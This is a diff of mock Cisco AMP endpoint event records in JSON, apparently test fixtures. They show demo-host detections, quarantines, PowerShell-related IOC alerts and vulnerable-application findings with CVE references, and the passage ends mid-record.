-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 